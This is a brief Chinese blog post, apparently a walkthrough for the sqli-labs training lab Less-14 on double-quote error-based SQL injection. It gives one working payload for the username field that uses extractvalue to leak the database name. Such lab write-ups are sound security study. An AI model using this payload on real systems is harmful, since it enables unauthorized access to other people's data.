sqli-labs:Less-14

Less-14实验主要是:双引号字符双注入

这和Less-13实验基本是一样的,因此我们可以在用户名位置输入:admin" and extractvalue(1,concat(0x7E,(select database()),0x7E))#

posted @ 2020-04-03 01:33  tangjf10  阅读(311)  评论(0编辑  收藏  举报